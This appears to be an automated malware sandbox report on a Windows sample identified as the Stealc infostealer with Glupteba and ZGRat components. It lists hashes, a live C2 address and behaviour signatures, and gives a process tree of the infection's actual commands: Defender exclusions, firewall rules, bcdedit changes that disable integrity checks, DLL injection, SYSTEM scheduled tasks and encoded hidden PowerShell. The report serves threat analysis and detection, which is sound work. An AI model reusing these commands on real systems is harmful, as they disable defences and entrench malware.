Analysis

  • max time kernel
    283s
  • max time network
    301s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18-04-2024 22:28

General

  • Target

    2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe

  • Size

    561KB

  • MD5

    46a804d527cc255bad3c068d588bff95

  • SHA1

    72429d34eef9986b3ad14dce58416c9c5753438a

  • SHA256

    2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d

  • SHA512

    2a3f478451930aa56bc019155a08c1c130f7499b942cf9c01c7809f43b4662010d061fd5b7c10e3c949e9611147b5893db12a59a20e17b3207752b2d7d36a8bc

  • SSDEEP

    12288:mj3ByhBS4gUqbBy2O2oQ26EnG/Q7n+chJ:mbBQBSVU52O2oQYG/2n+chJ

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Signatures

  • Detect ZGRat V1 2 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 17 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 48 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Checks BIOS information in registry 2 TTPs 5 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 8 IoCs
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 12 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 8 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Drops Chrome extension 3 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 35 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 26 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 20 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe
    "C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2196
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2aca1abc45a264170f1e9dad15de072ed216b3f56e79f2a721da170c37f1d53d.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1940
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2148
      • C:\Users\Admin\Pictures\BLs8QKIDGswyOr3AAVlhpZjd.exe
        "C:\Users\Admin\Pictures\BLs8QKIDGswyOr3AAVlhpZjd.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1048
        • C:\Users\Admin\AppData\Local\Temp\ut4.0.exe
          "C:\Users\Admin\AppData\Local\Temp\ut4.0.exe"
          4⤵
          • Executes dropped EXE
          PID:2044
        • C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
          "C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:1184
          • C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
            C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1496
            • C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
              C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:1628
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\SysWOW64\cmd.exe
                7⤵
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                PID:1168
        • C:\Users\Admin\AppData\Local\Temp\ut4.1.exe
          "C:\Users\Admin\AppData\Local\Temp\ut4.1.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2320
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1920
      • C:\Users\Admin\Pictures\ihVAocaecZJtyXZ7CkLGJpfb.exe
        "C:\Users\Admin\Pictures\ihVAocaecZJtyXZ7CkLGJpfb.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2768
        • C:\Users\Admin\Pictures\ihVAocaecZJtyXZ7CkLGJpfb.exe
          "C:\Users\Admin\Pictures\ihVAocaecZJtyXZ7CkLGJpfb.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:1896
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:2108
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:1820
        • C:\Users\Admin\Pictures\mCR3AVzyGr7MPxLy7AiVy03L.exe
          "C:\Users\Admin\Pictures\mCR3AVzyGr7MPxLy7AiVy03L.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1544
          • C:\Users\Admin\Pictures\mCR3AVzyGr7MPxLy7AiVy03L.exe
            "C:\Users\Admin\Pictures\mCR3AVzyGr7MPxLy7AiVy03L.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Loads dropped DLL
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2324
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:1116
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  6⤵
                  • Modifies Windows Firewall
                  • Modifies data under HKEY_USERS
                  PID:1740
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe
                5⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • Drops file in Windows directory
                • Modifies system certificate store
                PID:1456
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:2924
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  6⤵
                    PID:1624
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2308
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Modifies system certificate store
                    PID:2012
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1724
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1452
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1164
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2056
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2396
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1728
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:432
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:924
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:952
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2564
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1944
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1636
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1708
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1600
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    6⤵
                    • Executes dropped EXE
                    PID:1584
                  • C:\Windows\system32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:2956
                  • C:\Windows\windefender.exe
                    "C:\Windows\windefender.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2200
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      7⤵
                        PID:1812
                        • C:\Windows\SysWOW64\sc.exe
                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          8⤵
                          • Launches sc.exe
                          PID:2804
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                        PID:1740
                • C:\Users\Admin\Pictures\H1R9yVgc2hsnjftMSftKbBxx.exe
                  "C:\Users\Admin\Pictures\H1R9yVgc2hsnjftMSftKbBxx.exe"
                  3⤵
                  • Modifies firewall policy service
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Drops file in System32 directory
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:1464
                • C:\Users\Admin\Pictures\i5kRDbOKbrdtQX6nnSWk8jTv.exe
                  "C:\Users\Admin\Pictures\i5kRDbOKbrdtQX6nnSWk8jTv.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2008
                  • C:\Users\Admin\AppData\Local\Temp\7zS23F5.tmp\Install.exe
                    .\Install.exe /sQwdidHh "385118" /S
                    4⤵
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Enumerates system info in registry
                    PID:2084
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                      5⤵
                        PID:2784
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          6⤵
                            PID:2800
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              7⤵
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3028
                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                8⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3068
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\NHUdrkF.exe\" em /iwsite_idozm 385118 /S" /V1 /F
                          5⤵
                          • Drops file in Windows directory
                          • Creates scheduled task(s)
                          PID:3016
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "bWycNackLSywaqkmgR"
                          5⤵
                            PID:1308
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 07:28:18 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\sCLSBctEBYVgufH\LaaVLNZ.exe\" XT /SIsite_idTIg 385118 /S" /V1 /F
                            5⤵
                            • Drops file in Windows directory
                            • Creates scheduled task(s)
                            PID:2764
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
                            5⤵
                              PID:2788
                        • C:\Users\Admin\Pictures\QtUUngaStcIZoM7v0cC6tLZY.exe
                          "C:\Users\Admin\Pictures\QtUUngaStcIZoM7v0cC6tLZY.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:692
                          • C:\Users\Admin\AppData\Local\Temp\7zS32B4.tmp\Install.exe
                            .\Install.exe /sQwdidHh "385118" /S
                            4⤵
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Enumerates system info in registry
                            PID:1592
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                              5⤵
                                PID:1336
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                  6⤵
                                    PID:1412
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                      7⤵
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1556
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        8⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1680
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\eIclyav.exe\" em /kYsite_idpix 385118 /S" /V1 /F
                                  5⤵
                                  • Drops file in Windows directory
                                  • Creates scheduled task(s)
                                  PID:1916
                            • C:\Users\Admin\Pictures\G7hmDopetpLbfVrLne3Qrsqu.exe
                              "C:\Users\Admin\Pictures\G7hmDopetpLbfVrLne3Qrsqu.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              PID:1748
                              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                4⤵
                                • Executes dropped EXE
                                PID:2056
                                • C:\Windows\system32\msiexec.exe
                                  "msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
                                  5⤵
                                    PID:692
                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
                                    "ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
                                    5⤵
                                      PID:1180
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -u -p 2196 -s 672
                                2⤵
                                  PID:2624
                              • C:\Windows\system32\makecab.exe
                                "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240418222847.log C:\Windows\Logs\CBS\CbsPersist_20240418222847.cab
                                1⤵
                                • Drops file in Windows directory
                                PID:2128
                              • C:\Windows\system32\taskeng.exe
                                taskeng.exe {7CC94295-3ECA-4F63-89E2-ECE46BB78532} S-1-5-18:NT AUTHORITY\System:Service:
                                1⤵
                                  PID:2104
                                  • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\eIclyav.exe
                                    C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\eIclyav.exe em /kYsite_idpix 385118 /S
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Modifies data under HKEY_USERS
                                    PID:2564
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gumYGyCsP" /SC once /ST 18:02:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      3⤵
                                      • Creates scheduled task(s)
                                      PID:1664
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gumYGyCsP"
                                      3⤵
                                        PID:1140
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gumYGyCsP"
                                        3⤵
                                          PID:1740
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                          3⤵
                                            PID:2768
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              4⤵
                                                PID:1120
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                  5⤵
                                                  • Drops file in System32 directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2020
                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                    6⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2476
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                              3⤵
                                                PID:2312
                                                • C:\Windows\SysWOW64\reg.exe
                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:1408
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                3⤵
                                                  PID:1748
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1512
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                  3⤵
                                                    PID:1832
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                                      4⤵
                                                        PID:2676
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                      3⤵
                                                        PID:1760
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1216
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /C copy nul "C:\Windows\Temp\ofqvFcNvzeRditbz\GEulPGAJ\OMISXobrGwybBEEY.wsf"
                                                          3⤵
                                                            PID:1828
                                                          • C:\Windows\SysWOW64\wscript.exe
                                                            wscript "C:\Windows\Temp\ofqvFcNvzeRditbz\GEulPGAJ\OMISXobrGwybBEEY.wsf"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:2904
                                                            • C:\Windows\SysWOW64\reg.exe
